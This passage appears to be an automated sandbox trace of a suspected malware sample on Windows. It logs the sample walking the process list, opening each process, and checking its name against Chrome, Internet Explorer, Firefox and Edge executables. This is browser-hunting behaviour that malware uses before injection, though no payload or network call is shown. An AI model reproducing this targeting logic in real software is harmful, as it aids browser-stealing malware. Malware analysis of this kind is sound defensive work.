	[0227.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.049] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.050] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.050] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0227.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5f78
	[0227.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.051] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0227.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.051] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.051] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0227.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.052] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.052] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0227.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5f7c
	[0227.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.053] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0227.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.053] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.054] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0227.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.054] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.054] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0227.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5f80
	[0227.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.055] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0227.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.055] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.056] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0227.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.056] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.056] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0227.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5f84
	[0227.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.057] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0227.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.057] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.058] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0227.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.058] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.058] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5f88
	[0227.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.059] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.059] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.060] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.060] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.060] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.061] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5f8c
	[0227.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.061] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.062] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.062] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.062] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.062] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.063] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5f90
	[0227.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.063] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.064] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.064] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.064] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.065] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.065] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5f94
	[0227.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.066] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.066] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.066] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.067] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.067] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5f98
	[0227.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.068] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.068] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.068] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.069] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.069] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.070] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5f9c
	[0227.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.070] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.070] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.071] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.071] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5fa0
	[0227.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.072] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.073] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.073] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.074] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.074] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0227.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5fa4
	[0227.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.077] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0227.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.077] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.077] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0227.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.078] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.078] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5fa8
	[0227.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.079] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.079] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.079] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.080] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.080] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0227.081] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5fac
	[0227.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.081] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.081] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.082] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.082] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.082] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0227.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5fb0
	[0227.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.083] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0227.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.083] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.084] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0227.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.084] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.084] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.085] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5fb4
	[0227.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.085] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.086] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.086] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.086] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.087] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0227.087] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5fb8
	[0227.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.087] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0227.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.088] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.088] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0227.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.088] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.089] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0227.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5fbc
	[0227.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.090] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0227.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.090] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.091] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0227.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.091] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.091] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0227.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5fc0
	[0227.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.092] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0227.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.092] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.092] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0227.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.093] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.093] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0227.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5fc4
	[0227.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.094] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0227.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.094] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.095] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0227.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.095] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.095] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0227.096] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0227.096] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0227.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5fc8
	[0227.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.097] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0227.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.097] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.098] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0227.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.099] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.099] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0227.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5fcc
	[0227.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.101] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0227.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.101] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.102] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0227.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.102] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.102] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0227.103] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5fd0
	[0227.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.103] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0227.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.104] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.104] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0227.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.104] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.104] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0227.105] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5fd4
	[0227.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.105] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0227.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.106] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.106] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0227.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.107] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
